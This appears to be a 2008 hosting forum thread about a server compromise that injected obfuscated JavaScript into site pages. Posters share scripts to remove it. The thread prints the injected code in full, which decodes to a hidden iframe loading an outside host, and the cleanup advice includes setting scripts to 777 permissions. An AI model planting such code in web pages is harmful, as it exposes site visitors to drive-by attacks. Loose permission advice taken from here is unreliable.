Website Hacked.

**ManojB** · 10-19-2008 10:33 PM

Hello,

I am getting the following error message on my website :

Parse error: syntax error, unexpected '<' in

I have investigated and found that all my php pages contains the following tags :

It seems all my files has been corrupted, as I have manually removed this tags but still same problem. How can I overcome this problem. (suPHP has been disabled on my server)

**Bartuc** · 10-19-2008 11:35 PM

probably a virus on your computer causes this problem. You should run virus scan on your own pc. This virus inserts this code on your webpages via FTP. Best solution is formatting and reinstalling windows on your PC, changing your cpanel password and then manually cleaning these codes.

**oanielsen** · 10-20-2008 12:15 PM

This is a cpanel hack of sometype. it is in all the domains, and this code is also within the /cpapachebuild/buildapache/mhash/ directories too. It is ALL over the place. The whole server is infected with this.

**ManojB** · 10-20-2008 10:20 PM

It seems its problem with the latest cpanel release as my phpmyadmin was also infected.

**oanielsen** · 10-21-2008 12:05 AM

I spent almost 13 hours today figuring out a way to clean it up.

Lots of Shell and SED scripting!

Very frustrating.

**ManojB** · 10-21-2008 12:30 AM

Hello Oanielsen,

Can you please let me know how you have removed this from your files.

**sparek-3** · 10-21-2008 08:44 AM

What was the ownership and permissions of the files that were infected?

If the files were owned by root and had permissions of 0644, then you could be looking at a root level compromise. If root has been compromised you need to do a full system restore.

**deieno** · 10-27-2008 09:11 AM

Hi,
I am with the same problem, one server on LT was hacked ( could be cause LT's data base was hacked, again?) ?

Anyone know how to strip the malicious tags?

I found this script: http://forums.cpanel.net/showpost.ph...&postcount=241

But, what should be the regex to match this malicous code:

<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

**oanielsen** · 10-27-2008 09:41 AM

All the servers we had compromised were at LT also. It was on servers we had never had a trouble ticket on, so it was not because of un-enrypted e-mail. This was definately a direct database hack on the part LT. Make sure you change all your passwords on Servers at LT ASAP.

Here is the fix we used.

1. Download and install RPL http://www.laffeycomputer.com/rpl.html
2. There are 2 script files we had to create.
First Script we named fixhack.sh has the following code in it.

Code:

rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="                                                =jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1                                                ?=0jgsbnf?"; var result = "";' ''  *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'for(var i=0;i<source.length;i++) r                                                esult+=String.fromCharCode(source.charCodeAt(i)-1);' '' *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>'                                                 '' *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> <html> <body><scri                                                pt>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu                                                >2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="                                                =jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1                                                ?=0jgsbnf?"; var result = "";' '' *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>'                                                 '' *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> </body>' '' *
rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="                                                =jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1                                                ?=0jgsbnf?"; var result = "";' '' *

What that code is doing is running the RPL command for each of the lines you are wanting to find, and replacing the specified text with a NULL.

The next shell script executes the previous script and recurses through all the directories. EAch of these scripts we ran from the /home directory. Once you download RPL you will notice that it has a Recursive option, but it will bring your server to its knees, so it is better to use this script to do the recursion for you. We named the following piece of code recursehack.sh

Code:

find /home -type d | while read DIRNAME
do
cd $DIRNAME
/home/fixhack.sh
done

3. Make sure you CHMOD these scripts to 777
4. Execute ./recursehack.sh from the /home directory
5. We found that some of the things in the Cpanel directories were also infected. So, you need to run /scripts/upcp --force
6. You will also find a new directory at the root of your server called something like "pons" or something like that. Do an ls -ltr at the root of your server and you will see a new directory there. Within this directory is a file called "framer.htm" which is the code that was injected into each page, and another script file that did all the dirty work.

Hope this helps someone else. It definately kicked our *sses for a few hours.

**deieno** · 10-27-2008 11:27 AM

oanielsen,

thank you very much to share this script....
I'll run this right now

Our problem was exactly the same, root had the pons's folder with the same content.

I'll move my servers from LT ASAP. This kind of trouble don´t justify the raised prices :-(